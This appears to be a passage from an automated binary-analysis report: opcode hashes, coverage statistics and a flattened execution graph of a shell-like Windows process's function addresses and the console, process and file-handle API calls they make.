                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 112ff40a95d34841388b31947e1cf72a93c39629705f3855c594b603780d5e84
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD416D72A1A64B86FB54AF50E45427EB7A0EB45B40BD88136DA4F43760DFBCE444CB60

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:5.7%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:654
                                                                                                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                                                                                                                                                                        execution_graph 16723 7ff7d1528d80 16724 7ff7d1528da4 16723->16724 16725 7ff7d1528db6 16724->16725 16726 7ff7d1528dbf Sleep 16724->16726 16727 7ff7d1528ddb _amsg_exit 16725->16727 16729 7ff7d1528de7 16725->16729 16726->16724 16727->16729 16728 7ff7d1528e56 _initterm 16732 7ff7d1528e73 _IsNonwritableInCurrentImage 16728->16732 16729->16728 16730 7ff7d1528e3c 16729->16730 16729->16732 16737 7ff7d15237d8 GetCurrentThreadId OpenThread 16732->16737 16770 7ff7d15204f4 16737->16770 16739 7ff7d1523839 HeapSetInformation RegOpenKeyExW 16740 7ff7d152e9f8 RegQueryValueExW RegCloseKey 16739->16740 16741 7ff7d152388d 16739->16741 16743 7ff7d152ea41 GetThreadLocale 16740->16743 16742 7ff7d1525920 VirtualQuery VirtualQuery 16741->16742 16744 7ff7d15238ab GetConsoleOutputCP GetCPInfo 16742->16744 16756 7ff7d1523919 16743->16756 16744->16743 16745 7ff7d15238f1 memset 16744->16745 16745->16756 16746 7ff7d1524d5c 391 API calls 16746->16756 16747 7ff7d1523948 _setjmp 16747->16756 16748 7ff7d152eb27 _setjmp 16748->16756 16749 7ff7d15201b8 6 API calls 16749->16756 16750 7ff7d1513240 166 API calls 16750->16756 16751 7ff7d1524c1c 166 API calls 16751->16756 16752 7ff7d152eb71 _setmode 16752->16756 16753 7ff7d1538530 370 API calls 16753->16756 16754 7ff7d15286f0 182 API calls 16754->16756 16755 7ff7d1520580 12 API calls 16757 7ff7d152398b GetConsoleOutputCP GetCPInfo 16755->16757 16756->16740 16756->16746 16756->16747 16756->16748 16756->16749 16756->16750 16756->16751 16756->16752 16756->16753 16756->16754 16756->16755 16758 7ff7d15258e4 EnterCriticalSection LeaveCriticalSection 16756->16758 16760 7ff7d151be00 647 API calls 16756->16760 16761 7ff7d151df60 481 API calls 16756->16761 16762 7ff7d15258e4 EnterCriticalSection LeaveCriticalSection 16756->16762 16759 7ff7d15204f4 GetModuleHandleW GetProcAddress SetThreadLocale 16757->16759 16758->16756 16759->16756 16760->16756 16761->16756 16763 7ff7d152ebbe GetConsoleOutputCP GetCPInfo 16762->16763 16764 7ff7d15204f4 GetModuleHandleW GetProcAddress SetThreadLocale 16763->16764 16765 7ff7d152ebe6 16764->16765 16766 7ff7d151be00 647 API calls 16765->16766 16767 7ff7d1520580 12 API calls 16765->16767 16766->16765 16768 7ff7d152ebfc GetConsoleOutputCP GetCPInfo 16767->16768 16769 7ff7d15204f4 GetModuleHandleW GetProcAddress SetThreadLocale 16768->16769 16769->16756 16771 7ff7d1520504 16770->16771 16772 7ff7d152051e GetModuleHandleW 16771->16772 16773 7ff7d152054d GetProcAddress 16771->16773 16774 7ff7d152056c SetThreadLocale 16771->16774 16772->16771 16773->16771 21983 7ff7d1516be0 21984 7ff7d151cd90 166 API calls 21983->21984 21985 7ff7d1516c04 21984->21985 21986 7ff7d15341a2 21985->21986 21987 7ff7d1516c13 _pipe 21985->21987 21989 7ff7d1513278 166 API calls 21986->21989 21990 7ff7d1516c32 21987->21990 22020 7ff7d1516e26 21987->22020 21988 7ff7d1513278 166 API calls 21988->21986 21991 7ff7d15341bc 21989->21991 21993 7ff7d1516df1 21990->21993 22034 7ff7d151affc _dup 21990->22034 21992 7ff7d153e91c 198 API calls 21991->21992 21994 7ff7d15341c1 21992->21994 21996 7ff7d1513278 166 API calls 21994->21996 21998 7ff7d15341d2 21996->21998 21997 7ff7d1516c7d 21997->21986 22000 7ff7d151b038 _dup2 21997->22000 21999 7ff7d153e91c 198 API calls 21998->21999 22001 7ff7d15341d7 21999->22001 22002 7ff7d1516c93 22000->22002 22003 7ff7d1513278 166 API calls 22001->22003 22002->22001 22004 7ff7d151d208 _close 22002->22004 22005 7ff7d15341e4 22003->22005 22006 7ff7d1516ca4 22004->22006 22007 7ff7d153e91c 198 API calls 22005->22007 22036 7ff7d151be00 22006->22036 22009 7ff7d15341e9 22007->22009 22011 7ff7d1516d07 22013 7ff7d151b038 _dup2 22011->22013 22012 7ff7d1516ccf _get_osfhandle DuplicateHandle 22012->22011 22014 7ff7d1516d11 22013->22014 22014->22001 22015 7ff7d151d208 _close 22014->22015 22016 7ff7d1516d22 22015->22016 22017 7ff7d1516e21 22016->22017 22019 7ff7d151affc _dup 22016->22019 22018 7ff7d153e91c 198 API calls 22017->22018 22018->22020 22021 7ff7d1516d57 22019->22021 22020->21988 22021->21994 22022 7ff7d151b038 _dup2 22021->22022 22023 7ff7d1516d6c 22022->22023 22023->22001 22024 7ff7d151d208 _close 22023->22024 22025 7ff7d1516d7c 22024->22025 22026 7ff7d151be00 647 API calls 22025->22026 22027 7ff7d1516d9c 22026->22027 22028 7ff7d151b038 _dup2 22027->22028 22029 7ff7d1516da8 22028->22029 22029->22001 22030 7ff7d151d208 _close 22029->22030 22031 7ff7d1516db9 22030->22031 22031->22017 22032 7ff7d1516dc1 22031->22032 22032->21993 22070 7ff7d1516e60 22032->22070 22035 7ff7d151b018 22034->22035 22035->21997 22037 7ff7d151be1b 22036->22037 22048 7ff7d1516cc4 22036->22048 22038 7ff7d151be47 memset 22037->22038 22040 7ff7d151be67 22037->22040 22037->22048 22146 7ff7d151bff0 22038->22146 22041 7ff7d151be73 22040->22041 22043 7ff7d151bf29 22040->22043 22044 7ff7d151beaf 22040->22044 22042 7ff7d151be92 22041->22042 22046 7ff7d151bf0c 22041->22046 22054 7ff7d151bea1 22042->22054 22074 7ff7d151c620 GetConsoleTitleW 22042->22074 22045 7ff7d151cd90 166 API calls 22043->22045 22044->22048 22051 7ff7d151bff0 185 API calls 22044->22051 22049 7ff7d151bf33 22045->22049 22184 7ff7d151b0d8 memset 22046->22184 22048->22011 22048->22012 22049->22044 22052 7ff7d151bf70 22049->22052 22055 7ff7d15188a8 _wcsicmp 22049->22055 22051->22048 22064 7ff7d151bf75 22052->22064 22244 7ff7d15171ec 22052->22244 22054->22044 22059 7ff7d151af98 2 API calls 22054->22059 22058 7ff7d151bf5a 22055->22058 22056 7ff7d151bf1e 22056->22044 22058->22052 22062 7ff7d1520a6c 273 API calls 22058->22062 22059->22044 22060 7ff7d151bfa9 22060->22044 22061 7ff7d151cd90 166 API calls 22060->22061 22063 7ff7d151bfbb 22061->22063 22062->22052 22063->22044 22065 7ff7d152081c 166 API calls 22063->22065 22066 7ff7d151b0d8 194 API calls 22064->22066 22065->22064 22067 7ff7d151bf7f 22066->22067 22067->22044 22117 7ff7d1525ad8 22067->22117 22072 7ff7d1516e6d 22070->22072 22071 7ff7d1516eb9 22071->21993 22072->22071 22073 7ff7d1525cb4 7 API calls 22072->22073 22073->22072 22076 7ff7d151c675 22074->22076 22080 7ff7d151ca2f 22074->22080 22075 7ff7d152c5fc GetLastError 22075->22080 22077 7ff7d151ca40 17 API calls 22076->22077 22085 7ff7d151c69b 22077->22085 22078 7ff7d1513278 166 API calls 22078->22080 22079 7ff7d152855c ??_V@YAXPEAX 22079->22080 22080->22075 22080->22078 22080->22079 22081 7ff7d151c9b5 22084 7ff7d152855c ??_V@YAXPEAX 22081->22084 22082 7ff7d151c978 towupper 22104 7ff7d151c762 22082->22104 22083 7ff7d152855c ??_V@YAXPEAX 22083->22104 22105 7ff7d151c855 22084->22105 22085->22080 22085->22081 22087 7ff7d151d3f0 223 API calls 22085->22087 22085->22104 22086 7ff7d152c60e 22088 7ff7d153ec14 173 API calls 22086->22088 22089 7ff7d151c741 22087->22089 22088->22104 22091 7ff7d151c74d 22089->22091 22094 7ff7d151c8b5 wcsncmp 22089->22094 22090 7ff7d151c872 22092 7ff7d152855c ??_V@YAXPEAX 22090->22092 22097 7ff7d151bd38 207 API calls 22091->22097 22091->22104 22095 7ff7d151c87c 22092->22095 22093 7ff7d152c6b8 SetConsoleTitleW 22093->22090 22094->22091 22094->22104 22098 7ff7d1528f80 7 API calls 22095->22098 22096 7ff7d151c83d 22250 7ff7d151cb40 22096->22250 22097->22104 22099 7ff7d151c88e 22098->22099 22099->22054 22101 7ff7d151c78a wcschr 22101->22104 22103 7ff7d152291c 8 API calls 22103->22104 22104->22075 22104->22080 22104->22081 22104->22082 22104->22083 22104->22086 22104->22096 22104->22101 22104->22103 22106 7ff7d151ca25 22104->22106 22108 7ff7d152c684 22104->22108 22111 7ff7d15189c0 23 API calls 22104->22111 22112 7ff7d151ca2a 22104->22112 22114 7ff7d151ca16 GetLastError 22104->22114 22105->22090 22105->22093 22109 7ff7d1513278 166 API calls 22106->22109 22110 7ff7d1513278 166 API calls 22108->22110 22109->22080 22110->22080 22111->22104 22113 7ff7d1529158 7 API calls 22112->22113 22113->22080 22116 7ff7d1513278 166 API calls 22114->22116 22116->22080 22118 7ff7d151cd90 166 API calls 22117->22118 22119 7ff7d1525b12 22118->22119 22120 7ff7d1525b8b 22119->22120 22121 7ff7d151cb40 166 API calls 22119->22121 22122 7ff7d1528f80 7 API calls 22120->22122 22123 7ff7d1525b26 22121->22123 22124 7ff7d151bf99 22122->22124 22123->22120 22125 7ff7d1520a6c 273 API calls 22123->22125 22124->22054 22126 7ff7d1525b43 22125->22126 22127 7ff7d1525bb8 22126->22127 22128 7ff7d1525b48 GetConsoleTitleW 22126->22128 22129 7ff7d1525bbd GetConsoleTitleW 22127->22129 22130 7ff7d1525bf4 22127->22130 22131 7ff7d151cad4 172 API calls 22128->22131 22132 7ff7d151cad4 172 API calls 22129->22132 22133 7ff7d1525bfd 22130->22133 22134 7ff7d152f452 22130->22134 22135 7ff7d1525b66 22131->22135 22137 7ff7d1525bdb 22132->22137 22133->22120 22140 7ff7d1525c1b 22133->22140 22141 7ff7d152f462 22133->22141 22136 7ff7d1523c24 166 API calls 22134->22136 22266 7ff7d1524224 InitializeProcThreadAttributeList 22135->22266 22136->22120 22326 7ff7d15196e8 22137->22326 22144 7ff7d1513278 166 API calls 22140->22144 22143 7ff7d1513278 166 API calls 22141->22143 22142 7ff7d1525b7f 22145 7ff7d1525c3c SetConsoleTitleW 22142->22145 22143->22120 22144->22120 22145->22120 22147 7ff7d151c01c 22146->22147 22172 7ff7d151c0c4 22146->22172 22148 7ff7d151c022 22147->22148 22149 7ff7d151c086 22147->22149 22150 7ff7d151c030 22148->22150 22151 7ff7d151c113 22148->22151 22152 7ff7d151c144 22149->22152 22165 7ff7d151c094 22149->22165 22153 7ff7d151c039 wcschr 22150->22153 22154 7ff7d151c053 22150->22154 22151->22154 22159 7ff7d151ff70 2 API calls 22151->22159 22155 7ff7d151c151 22152->22155 22182 7ff7d151c1c8 22152->22182 22153->22154 22156 7ff7d151c301 22153->22156 22157 7ff7d151c058 22154->22157 22158 7ff7d151c0c6 22154->22158 22180 7ff7d151c211 22154->22180 22532 7ff7d151c460 22155->22532 22160 7ff7d151cd90 166 API calls 22156->22160 22167 7ff7d151ff70 2 API calls 22157->22167 22168 7ff7d151c073 22157->22168 22163 7ff7d151c0cf wcschr 22158->22163 22158->22168 22159->22154 22183 7ff7d151c30b 22160->22183 22162 7ff7d151c460 183 API calls 22162->22165 22166 7ff7d151c1be 22163->22166 22163->22168 22165->22162 22165->22172 22169 7ff7d151cd90 166 API calls 22166->22169 22167->22168 22170 7ff7d151c460 183 API calls 22168->22170 22168->22172 22169->22182 22170->22168 22171 7ff7d151c460 183 API calls 22171->22172 22172->22040 22173 7ff7d151c285 22178 7ff7d151b6b0 170 API calls 22173->22178 22173->22180 22174 7ff7d151b6b0 170 API calls 22174->22154 22175 7ff7d151d840 178 API calls 22175->22183 22176 7ff7d151ff70 2 API calls 22176->22172 22177 7ff7d151d840 178 API calls 22177->22182 22181 7ff7d151c2ac 22178->22181 22179 7ff7d151c3d4 22179->22168 22179->22174 22179->22180 22180->22176 22181->22168 22181->22180 22182->22172 22182->22173 22182->22177 22182->22180 22183->22172 22183->22175 22183->22179 22183->22180 22185 7ff7d151ca40 17 API calls 22184->22185 22201 7ff7d151b162 22185->22201 22186 7ff7d151b2e1 22188 7ff7d151b2f7 ??_V@YAXPEAX 22186->22188 22189 7ff7d151b303 22186->22189 22187 7ff7d151b1d9 22192 7ff7d151cd90 166 API calls 22187->22192 22207 7ff7d151b1ed 22187->22207 22188->22189 22191 7ff7d1528f80 7 API calls 22189->22191 22190 7ff7d1521ea0 8 API calls 22190->22201 22193 7ff7d151b315 22191->22193 22192->22207 22193->22042 22193->22056 22195 7ff7d151b228 _get_osfhandle 22197 7ff7d151b23f _get_osfhandle 22195->22197 22195->22207 22196 7ff7d152bfef _get_osfhandle SetFilePointer 22198 7ff7d152c01d 22196->22198 22196->22207 22197->22207 22200 7ff7d15233f0 _vsnwprintf 22198->22200 22199 7ff7d151affc _dup 22199->22207 22203 7ff7d152c038 22200->22203 22201->22186 22201->22187 22201->22190 22201->22201 22202 7ff7d15201b8 6 API calls 22202->22207 22208 7ff7d1513278 166 API calls 22203->22208 22204 7ff7d152c1c3 22205 7ff7d15233f0 _vsnwprintf 22204->22205 22205->22203 22206 7ff7d151d208 _close 22206->22207 22207->22186 22207->22195 22207->22196 22207->22199 22207->22202 22207->22204 22207->22206 22209 7ff7d152c060 22207->22209 22211 7ff7d151b038 _dup2 22207->22211 22212 7ff7d152c246 22207->22212 22215 7ff7d15226e0 19 API calls 22207->22215 22218 7ff7d151b356 22207->22218 22243 7ff7d152c1a5 22207->22243 22546 7ff7d153f318 _get_osfhandle GetFileType 22207->22546 22210 7ff7d152c1f9 22208->22210 22209->22212 22216 7ff7d15209f4 2 API calls 22209->22216 22213 7ff7d151af98 2 API calls 22210->22213 22211->22207 22217 7ff7d151af98 2 API calls 22212->22217 22213->22186 22214 7ff7d151b038 _dup2 22219 7ff7d152c1b7 22214->22219 22215->22207 22220 7ff7d152c084 22216->22220 22221 7ff7d152c24b 22217->22221 22227 7ff7d151af98 2 API calls 22218->22227 22222 7ff7d152c207 22219->22222 22223 7ff7d152c1be 22219->22223 22224 7ff7d151b900 166 API calls 22220->22224 22225 7ff7d153f1d8 166 API calls 22221->22225 22226 7ff7d151d208 _close 22222->22226 22228 7ff7d151d208 _close 22223->22228 22229 7ff7d152c08c 22224->22229 22225->22186 22226->22218 22230 7ff7d152c211 22227->22230 22228->22204 22231 7ff7d152c094 wcsrchr 22229->22231 22241 7ff7d152c0ad 22229->22241 22232 7ff7d15233f0 _vsnwprintf 22230->22232 22231->22241 22233 7ff7d152c22c 22232->22233 22234 7ff7d1513278 166 API calls 22233->22234 22234->22186 22235 7ff7d152c106 22237 7ff7d151ff70 2 API calls 22235->22237 22236 7ff7d152c0e0 _wcsnicmp 22236->22241 22238 7ff7d152c13b 22237->22238 22238->22212 22239 7ff7d152c146 SearchPathW 22238->22239 22239->22212 22240 7ff7d152c188 22239->22240 22242 7ff7d15226e0 19 API calls 22240->22242 22241->22235 22241->22236 22242->22243 22243->22214 22245 7ff7d1517211 _setjmp 22244->22245 22249 7ff7d1517279 22244->22249 22247 7ff7d1517265 22245->22247 22245->22249 22547 7ff7d15172b0 22247->22547 22249->22060 22251 7ff7d151cb63 22250->22251 22252 7ff7d151cd90 166 API calls 22251->22252 22253 7ff7d151c848 22252->22253 22253->22105 22254 7ff7d151cad4 22253->22254 22255 7ff7d151cad9 22254->22255 22263 7ff7d151cb05 22254->22263 22256 7ff7d151cd90 166 API calls 22255->22256 22255->22263 22257 7ff7d152c722 22256->22257 22258 7ff7d152c72e GetConsoleTitleW 22257->22258 22257->22263 22259 7ff7d152c74a 22258->22259 22258->22263 22260 7ff7d151b6b0 170 API calls 22259->22260 22265 7ff7d152c778 22260->22265 22261 7ff7d152c7ec 22262 7ff7d151ff70 2 API calls 22261->22262 22262->22263 22263->22105 22264 7ff7d152c7dd SetConsoleTitleW 22264->22261 22265->22261 22265->22264 22267 7ff7d15242ab UpdateProcThreadAttribute 22266->22267 22268 7ff7d152ecd4 GetLastError 22266->22268 22269 7ff7d15242eb memset memset GetStartupInfoW 22267->22269 22270 7ff7d152ecf0 GetLastError 22267->22270 22271 7ff7d152ecee 22268->22271 22273 7ff7d1523a90 170 API calls 22269->22273 22363 7ff7d1539eec 22270->22363 22275 7ff7d15243a8 22273->22275 22276 7ff7d151b900 166 API calls 22275->22276 22277 7ff7d15243bb 22276->22277 22278 7ff7d1524638 _local_unwind 22277->22278 22279 7ff7d15243cc 22277->22279 22278->22279 22280 7ff7d15243de wcsrchr 22279->22280 22281 7ff7d1524415 22279->22281 22280->22281 22282 7ff7d15243f7 lstrcmpW 22280->22282 22350 7ff7d1525a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22281->22350 22282->22281 22285 7ff7d1524668 22282->22285 22284 7ff7d152441a 22286 7ff7d152442a CreateProcessW 22284->22286 22289 7ff7d1524596 CreateProcessAsUserW 22284->22289 22351 7ff7d1539044 22285->22351 22288 7ff7d152448b 22286->22288 22290 7ff7d1524672 GetLastError 22288->22290 22291 7ff7d1524495 CloseHandle 22288->22291 22289->22288 22298 7ff7d152468d 22290->22298 22292 7ff7d152498c 8 API calls 22291->22292 22293 7ff7d15244c5 22292->22293 22297 7ff7d15244cd 22293->22297 22293->22298 22294 7ff7d15247a3 22294->22142 22295 7ff7d15244f8 22295->22294 22300 7ff7d1525cb4 7 API calls 22295->22300 22322 7ff7d1524612 22295->22322 22296 7ff7d151cd90 166 API calls 22299 7ff7d1524724 22296->22299 22297->22294 22297->22295 22312 7ff7d153a250 33 API calls 22297->22312 22298->22296 22298->22297 22302 7ff7d152472c _local_unwind 22299->22302 22309 7ff7d152473d 22299->22309 22304 7ff7d1524517 22300->22304 22301 7ff7d152461c 22305 7ff7d151ff70 GetProcessHeap RtlFreeHeap 22301->22305 22302->22309 22303 7ff7d15247e1 CloseHandle 22303->22301 22306 7ff7d15233f0 _vsnwprintf 22304->22306 22307 7ff7d15247fa DeleteProcThreadAttributeList 22305->22307 22308 7ff7d1524544 22306->22308 22310 7ff7d1528f80 7 API calls 22307->22310 22311 7ff7d152498c 8 API calls 22308->22311 22317 7ff7d151ff70 GetProcessHeap RtlFreeHeap 22309->22317 22313 7ff7d1524820 22310->22313 22314 7ff7d1524558 22311->22314 22312->22295 22313->22142 22315 7ff7d15247ae 22314->22315 22316 7ff7d1524564 22314->22316 22319 7ff7d15233f0 _vsnwprintf 22315->22319 22318 7ff7d152498c 8 API calls 22316->22318 22320 7ff7d152475b _local_unwind 22317->22320 22321 7ff7d1524577 22318->22321 22319->22322 22320->22297 22321->22301 22323 7ff7d152457f 22321->22323 22322->22301 22322->22303 22324 7ff7d153a920 210 API calls 22323->22324 22325 7ff7d1524584 22324->22325 22325->22301 22339 7ff7d1519737 22326->22339 22328 7ff7d151cd90 166 API calls 22328->22339 22329 7ff7d151977d memset 22330 7ff7d151ca40 17 API calls 22329->22330 22330->22339 22331 7ff7d152b76e 22333 7ff7d1513278 166 API calls 22331->22333 22332 7ff7d152b7b3 22335 7ff7d152b787 22333->22335 22334 7ff7d152b79a 22337 7ff7d152855c ??_V@YAXPEAX 22334->22337 22338 7ff7d152b795 22335->22338 22340 7ff7d153e944 393 API calls 22335->22340 22336 7ff7d151b364 17 API calls 22336->22339 22337->22332 22448 7ff7d1537694 22338->22448 22339->22328 22339->22329 22339->22331 22339->22332 22339->22334 22339->22336 22344 7ff7d15196b4 186 API calls 22339->22344 22345 7ff7d151986d 22339->22345 22365 7ff7d1521fac memset 22339->22365 22392 7ff7d151ce10 22339->22392 22442 7ff7d1525920 22339->22442 22340->22338 22344->22339 22346 7ff7d151988c 22345->22346 22347 7ff7d1519880 ??_V@YAXPEAX 22345->22347 22348 7ff7d1528f80 7 API calls 22346->22348 22347->22346 22349 7ff7d151989d 22348->22349 22349->22142 22352 7ff7d1523a90 170 API calls 22351->22352 22353 7ff7d1539064 22352->22353 22354 7ff7d153906e 22353->22354 22355 7ff7d1539083 22353->22355 22356 7ff7d152498c 8 API calls 22354->22356 22358 7ff7d151cd90 166 API calls 22355->22358 22357 7ff7d1539081 22356->22357 22357->22281 22359 7ff7d153909b 22358->22359 22359->22357 22360 7ff7d152498c 8 API calls 22359->22360 22361 7ff7d15390ec 22360->22361 22362 7ff7d151ff70 2 API calls 22361->22362 22362->22357 22364 7ff7d152ed0a DeleteProcThreadAttributeList 22363->22364 22364->22271 22366 7ff7d152203b 22365->22366 22367 7ff7d15220b0 22366->22367 22368 7ff7d1522094 22366->22368 22369 7ff7d1523060 171 API calls 22367->22369 22371 7ff7d152211c 22367->22371 22370 7ff7d15220a6 22368->22370 22372 7ff7d1513278 166 API calls 22368->22372 22369->22371 22373 7ff7d1528f80 7 API calls 22370->22373 22371->22370 22374 7ff7d1522e44 2 API calls 22371->22374 22372->22370 22375 7ff7d1522325 22373->22375 22376 7ff7d1522148 22374->22376 22375->22339 22376->22370 22377 7ff7d1522d70 3 API calls 22376->22377 22378 7ff7d15221af 22377->22378 22379 7ff7d151b900 166 API calls 22378->22379 22381 7ff7d15221d0 22379->22381 22380 7ff7d152e04a ??_V@YAXPEAX 22380->22370 22381->22380 22382 7ff7d152221c wcsspn 22381->22382 22391 7ff7d15222a4 ??_V@YAXPEAX 22381->22391 22384 7ff7d151b900 166 API calls 22382->22384 22385 7ff7d152223b 22384->22385 22385->22380 22389 7ff7d1522252 22385->22389 22386 7ff7d152228f 22387 7ff7d151d3f0 223 API calls 22386->22387 22387->22391 22388 7ff7d152e06d wcschr 22388->22389 22389->22386 22389->22388 22390 7ff7d152e090 towupper 22389->22390 22390->22386 22390->22389 22391->22370 22393 7ff7d151d0f8 22392->22393 22412 7ff7d151ce5b 22392->22412 22394 7ff7d1528f80 7 API calls 22393->22394 22397 7ff7d151d10a 22394->22397 22395 7ff7d152c860 22396 7ff7d152c97c 22395->22396 22399 7ff7d153ee88 390 API calls 22395->22399 22400 7ff7d153e9b4 197 API calls 22396->22400 22397->22339 22398 7ff7d1520494 182 API calls 22398->22412 22401 7ff7d152c879 22399->22401 22402 7ff7d152c981 longjmp 22400->22402 22403 7ff7d152c95c 22401->22403 22404 7ff7d152c882 EnterCriticalSection LeaveCriticalSection 22401->22404 22405 7ff7d152c99a 22402->22405 22403->22396 22408 7ff7d15196b4 186 API calls 22403->22408 22418 7ff7d151d0e3 22404->22418 22405->22393 22407 7ff7d152c9b3 ??_V@YAXPEAX 22405->22407 22407->22393 22408->22403 22409 7ff7d151ceaa _tell 22410 7ff7d151d208 _close 22409->22410 22410->22412 22411 7ff7d151cd90 166 API calls 22411->22412 22412->22393 22412->22395 22412->22398 22412->22405 22412->22411 22413 7ff7d152c9d5 22412->22413 22415 7ff7d151b900 166 API calls 22412->22415 22412->22418 22422 7ff7d151cf33 memset 22412->22422 22425 7ff7d151ca40 17 API calls 22412->22425 22426 7ff7d151d184 wcschr 22412->22426 22427 7ff7d153bfec 176 API calls 22412->22427 22428 7ff7d152c9c9 22412->22428 22429 7ff7d151d1a7 wcschr 22412->22429 22431 7ff7d153778c 166 API calls 22412->22431 22432 7ff7d151be00 635 API calls 22412->22432 22433 7ff7d1520a6c 273 API calls 22412->22433 22434 7ff7d1523448 166 API calls 22412->22434 22435 7ff7d1520580 12 API calls 22412->22435 22436 7ff7d151cfab _wcsicmp 22412->22436 22440 7ff7d1521fac 238 API calls 22412->22440 22441 7ff7d151d044 ??_V@YAXPEAX 22412->22441 22454 7ff7d151df60 22412->22454 22474 7ff7d153c738 22412->22474 22414 7ff7d153d610 167 API calls 22413->22414 22417 7ff7d152c9da 22414->22417 22415->22412 22416 7ff7d152ca07 22419 7ff7d153e91c 198 API calls 22416->22419 22417->22416 22420 7ff7d153bfec 176 API calls 22417->22420 22418->22339 22424 7ff7d152ca0c 22419->22424 22421 7ff7d152c9f1 22420->22421 22423 7ff7d1513240 166 API calls 22421->22423 22422->22412 22423->22416 22424->22339 22425->22412 22426->22412 22427->22412 22430 7ff7d152855c ??_V@YAXPEAX 22428->22430 22429->22412 22430->22393 22431->22412 22432->22412 22433->22412 22434->22412 22437 7ff7d151d003 GetConsoleOutputCP GetCPInfo 22435->22437 22436->22412 22438 7ff7d15204f4 3 API calls 22437->22438 22438->22412 22440->22412 22441->22412 22443 7ff7d152596c 22442->22443 22447 7ff7d1525a12 22442->22447 22444 7ff7d152598d VirtualQuery 22443->22444 22443->22447 22446 7ff7d15259ad 22444->22446 22444->22447 22445 7ff7d15259b7 VirtualQuery 22445->22446 22445->22447 22446->22445 22446->22447 22447->22339 22449 7ff7d15376a3 22448->22449 22450 7ff7d15376b7 22449->22450 22452 7ff7d15196b4 186 API calls 22449->22452 22451 7ff7d153e9b4 197 API calls 22450->22451 22453 7ff7d15376bc longjmp 22451->22453 22452->22449 22455 7ff7d151dfe2 22454->22455 22456 7ff7d151df93 22454->22456 22458 7ff7d151e100 VirtualFree 22455->22458 22459 7ff7d151e00b _setjmp 22455->22459 22456->22455 22457 7ff7d151df9f GetProcessHeap RtlFreeHeap 22456->22457 22457->22455 22457->22456 22458->22455 22460 7ff7d151e04a 22459->22460 22461 7ff7d151e0c3 22459->22461 22462 7ff7d151e600 473 API calls 22460->22462 22461->22409 22463 7ff7d151e073 22462->22463 22464 7ff7d151e0e0 longjmp 22463->22464 22465 7ff7d151e081 22463->22465 22466 7ff7d151e0b0 22464->22466 22467 7ff7d151d250 475 API calls 22465->22467 22466->22461 22484 7ff7d153d3fc 22466->22484 22468 7ff7d151e086 22467->22468 22468->22466 22471 7ff7d151e600 473 API calls 22468->22471 22472 7ff7d151e0a7 22471->22472 22472->22466 22473 7ff7d153d610 167 API calls 22472->22473 22473->22466 22475 7ff7d153c775 22474->22475 22479 7ff7d153c7ab 22474->22479 22476 7ff7d151cd90 166 API calls 22475->22476 22478 7ff7d153c781 22476->22478 22477 7ff7d153c8d4 22477->22412 22478->22477 22480 7ff7d151b0d8 194 API calls 22478->22480 22479->22477 22479->22478 22481 7ff7d151b6b0 170 API calls 22479->22481 22482 7ff7d151b038 _dup2 22479->22482 22483 7ff7d151d208 _close 22479->22483 22480->22477 22481->22479 22482->22479 22483->22479 22501 7ff7d153d419 22484->22501 22485 7ff7d152cadf 22486 7ff7d1523448 166 API calls 22486->22501 22487 7ff7d153d592 22489 7ff7d1523448 166 API calls 22487->22489 22488 7ff7d153d5c4 22490 7ff7d1523448 166 API calls 22488->22490 22492 7ff7d153d5a5 22489->22492 22490->22485 22493 7ff7d153d5ba 22492->22493 22495 7ff7d1523448 166 API calls 22492->22495 22502 7ff7d153d36c 22493->22502 22494 7ff7d153d546 22494->22488 22497 7ff7d153d555 22494->22497 22495->22493 22509 7ff7d153d31c 22497->22509 22498 7ff7d153d541 22498->22487 22498->22488 22498->22494 22500 7ff7d153d589 22498->22500 22499 7ff7d153d3fc 166 API calls 22499->22501 22500->22487 22500->22497 22501->22485 22501->22486 22501->22487 22501->22488 22501->22497 22501->22498 22501->22499 22503 7ff7d153d3d8 22502->22503 22504 7ff7d153d381 22502->22504 22505 7ff7d15234a0 166 API calls 22504->22505 22507 7ff7d153d390 22505->22507 22506 7ff7d1523448 166 API calls 22506->22507 22507->22503 22507->22506 22508 7ff7d15234a0 166 API calls 22507->22508 22508->22507 22510 7ff7d1523448 166 API calls 22509->22510 22511 7ff7d153d33b 22510->22511 22512 7ff7d153d36c 166 API calls 22511->22512 22513 7ff7d153d343 22512->22513 22514 7ff7d153d3fc 166 API calls 22513->22514 22519 7ff7d153d34e 22514->22519 22515 7ff7d153d5c2 22515->22485 22516 7ff7d153d592 22518 7ff7d1523448 166 API calls 22516->22518 22517 7ff7d153d5c4 22520 7ff7d1523448 166 API calls 22517->22520 22522 7ff7d153d5a5 22518->22522 22519->22515 22519->22516 22519->22517 22524 7ff7d1523448 166 API calls 22519->22524 22527 7ff7d153d541 22519->22527 22530 7ff7d153d555 22519->22530 22531 7ff7d153d3fc 166 API calls 22519->22531 22520->22515 22521 7ff7d153d31c 166 API calls 22521->22515 22523 7ff7d153d5ba 22522->22523 22525 7ff7d1523448 166 API calls 22522->22525 22526 7ff7d153d36c 166 API calls 22523->22526 22524->22519 22525->22523 22526->22515 22527->22516 22527->22517 22528 7ff7d153d546 22527->22528 22529 7ff7d153d589 22527->22529 22528->22517 22528->22530 22529->22516 22529->22530 22530->22521 22531->22519 22533 7ff7d151c4c9 22532->22533 22534 7ff7d151c486 22532->22534 22537 7ff7d151ff70 2 API calls 22533->22537 22539 7ff7d151c161 22533->22539 22535 7ff7d151c48e wcschr 22534->22535 22534->22539 22536 7ff7d151c4ef 22535->22536 22535->22539 22538 7ff7d151cd90 166 API calls 22536->22538 22537->22539 22540 7ff7d151c4f9 22538->22540 22539->22171 22539->22172 22540->22539 22541 7ff7d151d840 178 API calls 22540->22541 22544 7ff7d151c5bd 22540->22544 22545 